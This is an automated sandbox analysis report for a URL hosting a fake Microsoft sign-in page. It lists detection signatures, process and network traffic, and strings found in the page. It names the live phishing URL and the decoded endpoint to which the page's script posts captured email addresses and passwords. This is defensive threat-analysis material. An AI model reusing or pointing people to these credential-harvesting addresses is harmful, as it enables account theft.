Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html

Overview

General Information

Sample URL:	http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html
Analysis ID:	1446882
Infos:

Detection

HTMLPhisher

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Yara detected HtmlPhish10

AI detected suspicious javascript

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

Classification

×

Process Tree

System is w10x64

chrome.exe (PID: 5356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2212,i,1600881696001814177,16701260416799824026,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_167	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html	Avira URL Cloud: detection malicious, Label: phishing
Source: http://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html	SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

AI detected phishing page

Source: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html

LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html' does not match the legitimate Microsoft domain (e.g., microsoft.com). The page contains a login form asking for a password, which is a common phishing technique. The domain name appears suspicious and unrelated to Microsoft. The use of social engineering techniques is evident as the page mimics a legitimate Microsoft login page to deceive users. DOM: 0.0.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_167, type: DROPPED

AI detected suspicious javascript

Source: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html

LLM: Score: 9 Reasons: The JavaScript code captures user email and password and sends them to an external server (c2millwrightmachineshop.ca) via an AJAX POST request. This behavior is indicative of phishing or credential harvesting. The use of base64 encoding to obscure the URL further suggests malicious intent. DOM: 0.0.pages.csv

Phishing site detected (based on image similarity)

Source: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html

Matcher: Template: microsoft matched

Source: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html	HTTP Parser: Number of links: 0
Source: https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAYWSu4vTAADGm_au1zvQO0VEEeQGBxXS5tU8Kg49m0uba5LWJO0lgyVt0jyaV9u0aTIdTo43OdwkIg4nLk4iiDffdIuLoyCIgxxOiou9v8Dlgw9-fMv321jDi2QRKkL3c3ARrtzBUKysEX0KpDQcBTEKhkANQ3AQLaM4ikCwXobQydWNrQP6258nN7_Sr3efvnn1-fzvMXDbiqJwWimV4jguBsOhPTCKg8AruZqv2775HgDOAOA7ABxlVw0flMXj7BRHCRzFSJzCcQzBYAinigrCJbzE2mqXjlSmjSgJBPEevWhKZswz7YhH5ITzOJj3VFeoWY66ZHlGhjlmyTs0xj1a8qluNbuspUijiPd4m5eqsSApy53O6Et2U6jOIgu5iGBip8av7PowmHi9MJhGR7nn2YlpRA1nFOm2WWtFCian7LSh2qbLNxGQjOtE0yL0RJtbLT1g91TIjljHpgYttGeIC7_pDQfueMF1zJDSGMVE6WqDEXFWwtvKUBLS_VQQSXjIk464GzHJqDkLU6xOmi5EJCEqzOmpk87mCYmEYrutN4ZUn9ujPTcZDagIdvpwYKhpDZwlrTFIWb3I1H1kZIug2yCEMcu0SEXq-QuC1z153JrLUoDAEYjUFTFs99vYXOt03J2eXN-btYxJzbGZVNUbEJ4ws2RB7ldHeNmtph6PonKP6gwm83A6ZQPJEbvxu1x-eaYX-Ke5y0Fo-La-HU6Coe0aZyvAj5XrhfxW4UZmO3P3GpSrFAobW5mL9nsFeLm6tEU-qDz4ufmRfvvi3q2TT4eZ09VSXVW7jiA1-qQSsIsBYcCxxPnCTuQmlkSNISTAm_N-jdEI7CFcgQ_zwGE-f5q_0qj1eFoSpSpfqz6uIT3oPA88W8t8WP-PfyeXMv8A0&mkt...	HTTP Parser: Number of links: 0

Source: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html

HTTP Parser: Base64 decoded: https://c2millwrightmachineshop.ca/wp-from/prv.php

Source: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html

HTTP Parser: Title: Sign in to your account does not match URL

Source: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html

HTTP Parser: <input type="password" .../> found

Source: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html	HTTP Parser: No <meta name="author".. found
Source: https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAYWSu4vTAADGm_au1zvQO0VEEeQGBxXS5tU8Kg49m0uba5LWJO0lgyVt0jyaV9u0aTIdTo43OdwkIg4nLk4iiDffdIuLoyCIgxxOiou9v8Dlgw9-fMv321jDi2QRKkL3c3ARrtzBUKysEX0KpDQcBTEKhkANQ3AQLaM4ikCwXobQydWNrQP6258nN7_Sr3efvnn1-fzvMXDbiqJwWimV4jguBsOhPTCKg8AruZqv2775HgDOAOA7ABxlVw0flMXj7BRHCRzFSJzCcQzBYAinigrCJbzE2mqXjlSmjSgJBPEevWhKZswz7YhH5ITzOJj3VFeoWY66ZHlGhjlmyTs0xj1a8qluNbuspUijiPd4m5eqsSApy53O6Et2U6jOIgu5iGBip8av7PowmHi9MJhGR7nn2YlpRA1nFOm2WWtFCian7LSh2qbLNxGQjOtE0yL0RJtbLT1g91TIjljHpgYttGeIC7_pDQfueMF1zJDSGMVE6WqDEXFWwtvKUBLS_VQQSXjIk464GzHJqDkLU6xOmi5EJCEqzOmpk87mCYmEYrutN4ZUn9ujPTcZDagIdvpwYKhpDZwlrTFIWb3I1H1kZIug2yCEMcu0SEXq-QuC1z153JrLUoDAEYjUFTFs99vYXOt03J2eXN-btYxJzbGZVNUbEJ4ws2RB7ldHeNmtph6PonKP6gwm83A6ZQPJEbvxu1x-eaYX-Ke5y0Fo-La-HU6Coe0aZyvAj5XrhfxW4UZmO3P3GpSrFAobW5mL9nsFeLm6tEU-qDz4ufmRfvvi3q2TT4eZ09VSXVW7jiA1-qQSsIsBYcCxxPnCTuQmlkSNISTAm_N-jdEI7CFcgQ_zwGE-f5q_0qj1eFoSpSpfqz6uIT3oPA88W8t8WP-PfyeXMv8A0&mkt	HTTP Parser: No <meta name="author".. found
Source: https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAYWSu4vTAADGm_au1zvQO0VEEeQGBxXS5tU8Kg49m0uba5LWJO0lgyVt0jyaV9u0aTIdTo43OdwkIg4nLk4iiDffdIuLoyCIgxxOiou9v8Dlgw9-fMv321jDi2QRKkL3c3ARrtzBUKysEX0KpDQcBTEKhkANQ3AQLaM4ikCwXobQydWNrQP6258nN7_Sr3efvnn1-fzvMXDbiqJwWimV4jguBsOhPTCKg8AruZqv2775HgDOAOA7ABxlVw0flMXj7BRHCRzFSJzCcQzBYAinigrCJbzE2mqXjlSmjSgJBPEevWhKZswz7YhH5ITzOJj3VFeoWY66ZHlGhjlmyTs0xj1a8qluNbuspUijiPd4m5eqsSApy53O6Et2U6jOIgu5iGBip8av7PowmHi9MJhGR7nn2YlpRA1nFOm2WWtFCian7LSh2qbLNxGQjOtE0yL0RJtbLT1g91TIjljHpgYttGeIC7_pDQfueMF1zJDSGMVE6WqDEXFWwtvKUBLS_VQQSXjIk464GzHJqDkLU6xOmi5EJCEqzOmpk87mCYmEYrutN4ZUn9ujPTcZDagIdvpwYKhpDZwlrTFIWb3I1H1kZIug2yCEMcu0SEXq-QuC1z153JrLUoDAEYjUFTFs99vYXOt03J2eXN-btYxJzbGZVNUbEJ4ws2RB7ldHeNmtph6PonKP6gwm83A6ZQPJEbvxu1x-eaYX-Ke5y0Fo-La-HU6Coe0aZyvAj5XrhfxW4UZmO3P3GpSrFAobW5mL9nsFeLm6tEU-qDz4ufmRfvvi3q2TT4eZ09VSXVW7jiA1-qQSsIsBYcCxxPnCTuQmlkSNISTAm_N-jdEI7CFcgQ_zwGE-f5q_0qj1eFoSpSpfqz6uIT3oPA88W8t8WP-PfyeXMv8A0&mkt	HTTP Parser: No <meta name="author".. found

Source: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.html	HTTP Parser: No <meta name="copyright".. found
Source: https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAYWSu4vTAADGm_au1zvQO0VEEeQGBxXS5tU8Kg49m0uba5LWJO0lgyVt0jyaV9u0aTIdTo43OdwkIg4nLk4iiDffdIuLoyCIgxxOiou9v8Dlgw9-fMv321jDi2QRKkL3c3ARrtzBUKysEX0KpDQcBTEKhkANQ3AQLaM4ikCwXobQydWNrQP6258nN7_Sr3efvnn1-fzvMXDbiqJwWimV4jguBsOhPTCKg8AruZqv2775HgDOAOA7ABxlVw0flMXj7BRHCRzFSJzCcQzBYAinigrCJbzE2mqXjlSmjSgJBPEevWhKZswz7YhH5ITzOJj3VFeoWY66ZHlGhjlmyTs0xj1a8qluNbuspUijiPd4m5eqsSApy53O6Et2U6jOIgu5iGBip8av7PowmHi9MJhGR7nn2YlpRA1nFOm2WWtFCian7LSh2qbLNxGQjOtE0yL0RJtbLT1g91TIjljHpgYttGeIC7_pDQfueMF1zJDSGMVE6WqDEXFWwtvKUBLS_VQQSXjIk464GzHJqDkLU6xOmi5EJCEqzOmpk87mCYmEYrutN4ZUn9ujPTcZDagIdvpwYKhpDZwlrTFIWb3I1H1kZIug2yCEMcu0SEXq-QuC1z153JrLUoDAEYjUFTFs99vYXOt03J2eXN-btYxJzbGZVNUbEJ4ws2RB7ldHeNmtph6PonKP6gwm83A6ZQPJEbvxu1x-eaYX-Ke5y0Fo-La-HU6Coe0aZyvAj5XrhfxW4UZmO3P3GpSrFAobW5mL9nsFeLm6tEU-qDz4ufmRfvvi3q2TT4eZ09VSXVW7jiA1-qQSsIsBYcCxxPnCTuQmlkSNISTAm_N-jdEI7CFcgQ_zwGE-f5q_0qj1eFoSpSpfqz6uIT3oPA88W8t8WP-PfyeXMv8A0&mkt...	HTTP Parser: No <meta name="copyright".. found
Source: https://passwordreset.microsoftonline.com/?ru=https%3a%2f%2flogin.microsoftonline.com%2fcommon%2freprocess%3fctx%3drQIIAYWSu4vTAADGm_au1zvQO0VEEeQGBxXS5tU8Kg49m0uba5LWJO0lgyVt0jyaV9u0aTIdTo43OdwkIg4nLk4iiDffdIuLoyCIgxxOiou9v8Dlgw9-fMv321jDi2QRKkL3c3ARrtzBUKysEX0KpDQcBTEKhkANQ3AQLaM4ikCwXobQydWNrQP6258nN7_Sr3efvnn1-fzvMXDbiqJwWimV4jguBsOhPTCKg8AruZqv2775HgDOAOA7ABxlVw0flMXj7BRHCRzFSJzCcQzBYAinigrCJbzE2mqXjlSmjSgJBPEevWhKZswz7YhH5ITzOJj3VFeoWY66ZHlGhjlmyTs0xj1a8qluNbuspUijiPd4m5eqsSApy53O6Et2U6jOIgu5iGBip8av7PowmHi9MJhGR7nn2YlpRA1nFOm2WWtFCian7LSh2qbLNxGQjOtE0yL0RJtbLT1g91TIjljHpgYttGeIC7_pDQfueMF1zJDSGMVE6WqDEXFWwtvKUBLS_VQQSXjIk464GzHJqDkLU6xOmi5EJCEqzOmpk87mCYmEYrutN4ZUn9ujPTcZDagIdvpwYKhpDZwlrTFIWb3I1H1kZIug2yCEMcu0SEXq-QuC1z153JrLUoDAEYjUFTFs99vYXOt03J2eXN-btYxJzbGZVNUbEJ4ws2RB7ldHeNmtph6PonKP6gwm83A6ZQPJEbvxu1x-eaYX-Ke5y0Fo-La-HU6Coe0aZyvAj5XrhfxW4UZmO3P3GpSrFAobW5mL9nsFeLm6tEU-qDz4ufmRfvvi3q2TT4eZ09VSXVW7jiA1-qQSsIsBYcCxxPnCTuQmlkSNISTAm_N-jdEI7CFcgQ_zwGE-f5q_0qj1eFoSpSpfqz6uIT3oPA88W8t8WP-PfyeXMv8A0&mkt...	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.4:49752 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.4:60899 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.4:60898 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 2.18.97.153
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /2024ot.html HTTP/1.1Host: pub-7fd529f896e54cb89ccd931b77e144a6.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-from/prv.php HTTP/1.1Host: c2millwrightmachineshop.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pub-7fd529f896e54cb89ccd931b77e144a6.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/2024ot.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-from/prv.php HTTP/1.1Host: c2millwrightmachineshop.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /2024ot.html HTTP/1.1Host: pub-7fd529f896e54cb89ccd931b77e144a6.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: c2millwrightmachineshop.ca
Source: global traffic	DNS traffic detected: DNS query: passwordreset.microsoftonline.com
Source: global traffic	DNS traffic detected: DNS query: ajax.aspnetcdn.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 22:29:18 GMTContent-Type: text/htmlContent-Length: 27242Connection: closeServer: cloudflareCF-RAY: 88887be6fd75427f-EWR

Source: chromecache_167.2.dr	String found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg
Source: chromecache_167.2.dr	String found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.
Source: chromecache_167.2.dr	String found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d
Source: chromecache_167.2.dr	String found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90b
Source: sets.json.0.dr	String found in binary or memory: https://abczdrowie.pl
Source: chromecache_136.2.dr	String found in binary or memory: https://account.live.com/resetpassword.aspx
Source: sets.json.0.dr	String found in binary or memory: https://alice.tw
Source: sets.json.0.dr	String found in binary or memory: https://autobild.de
Source: sets.json.0.dr	String found in binary or memory: https://baomoi.com
Source: sets.json.0.dr	String found in binary or memory: https://bild.de
Source: sets.json.0.dr	String found in binary or memory: https://blackrock.com
Source: sets.json.0.dr	String found in binary or memory: https://blackrockadvisorelite.it
Source: sets.json.0.dr	String found in binary or memory: https://bluradio.com
Source: sets.json.0.dr	String found in binary or memory: https://bolasport.com
Source: sets.json.0.dr	String found in binary or memory: https://bonvivir.com
Source: sets.json.0.dr	String found in binary or memory: https://bumbox.com
Source: sets.json.0.dr	String found in binary or memory: https://businessinsider.com.pl
